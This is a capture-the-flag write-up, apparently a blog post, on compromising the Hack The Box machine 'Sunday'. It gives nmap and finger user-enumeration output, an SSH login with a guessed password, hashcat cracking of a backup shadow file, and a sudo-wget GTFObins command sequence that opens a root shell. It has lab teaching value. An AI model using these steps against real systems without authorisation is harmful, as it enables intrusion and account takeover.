- Published on
HTB Sunday
- Authors
- Name
- collinhacks
- @collinhacks
Sunday
Enumeration
nmap all ports, full enumerate
nmap -p- -sV -A <ip> --open -o full-enumerate.nmap
âââ(collinhacksăżCH)-[~/Lab/HTB/Sunday]
ââ$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 21:01 EDT
Nmap scan report for 10.129.162.17
Host is up (0.041s latency).
Not shown: 61978 filtered tcp ports (no-response), 3552 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
| http-title: Solaris Dashboard
|_Requested resource was https://10.129.162.17:6787/solaris/
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.89 seconds
nmap (all identified TCP ports + default scripts & service versions)
nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap
ââ$ nmap -p 79,111,515,6787,22022 -sV --script default --script http-methods --script http-headers 10.129.162.17 -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 21:08 EDT
Nmap scan report for 10.129.162.17
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-headers:
| Date: Fri, 21 Jul 2023 01:10:03 GMT
| Server: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| X-Frame-Options: SAMEORIGIN
| Last-Modified: Fri, 17 Aug 2018 02:07:09 GMT
| ETag: "f46-57398045d4d40"
| Accept-Ranges: bytes
| Content-Length: 3910
| Cache-Control: max-age=7200
| Expires: Fri, 21 Jul 2023 03:10:03 GMT
| Vary: Accept-Encoding
| Strict-Transport-Security: max-age=15768000
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-title: Solaris Dashboard
|_Requested resource was https://10.129.162.17:6787/solaris/
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.37 seconds
nmap (vuln scan)
nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap
Port Enumeration
Port 79 finger
finger admin@$IPandfinger user@$IP
more enum for finger https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.162.17 | less -Sresults in 2 odd entries,sunnyandsammywithsshtags so we can assume they are active.
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Thu Jul 20 22:17:16 2023 #########
access@10.129.162.17: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.129.162.17: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin >
anne marie@10.129.162.17: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.129.162.17: bin ??? < . . . . >..
dee dee@10.129.162.17: Login Name TTY Idle When Where..dee ???..dee ???..
ike@10.129.162.17: ikeuser IKE Admin < . . . . >..
jo ann@10.129.162.17: Login Name TTY Idle When Where..ann ???..jo ???..
la verne@10.129.162.17: Login Name TTY Idle When Where..la ???..verne ???..
line@10.129.162.17: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.129.162.17: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.129.162.17: Login Name TTY Idle When Where..mela ???..miof ???..
root@10.129.162.17: root Super-User console <Apr 13, 2022>..
sammy@10.129.162.17: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sunny@10.129.162.17: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sys@10.129.162.17: sys ??? < . . . . >..
zsa zsa@10.129.162.17: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Thu Jul 20 22:20:36 2023 #########
16 results.
10177 queries in 200 seconds (50.9 queries / sec)
- guessed the password
ssh -p 22022 sunny@<ip>password =sunday- hydra wouldâve worked here too
Exploitation
Step by step process:
Port 22022
sudo -l
sunny@sunday:~$ sudo -l
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
fucker lol
checked for anything out of the ordinary with
ls -la ~/; ls -la /home/*/ / /home/*/.bash_history/backupdirectory spotted- has a shadow.txt file
Cracked
passwd.txtandshadow.txt:hashcat -m 7400 passwords.txt /usr/share/wordlists/rockyou.txt --forceon local machine
su sammycooldude!sudo -lto check permissiosn for sammy
We can see
wgetruns as root, which is ez GTFObins exploit:
just copy pasted it into terminal ez root
sammy@sunday:~$
sammy@sunday:~$ TF=$(mktemp)
sammy@sunday:~$ chmod +x $TF
sammy@sunday:~$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sammy@sunday:~$ sudo wget --use-askpass=$TF 0
Useful resource links
https://0xdf.gitlab.io/2018/09/29/htb-sunday.html 6 methods to wget privilege escalation
Lessons Learned
wget priv esc
sudo -l is user specific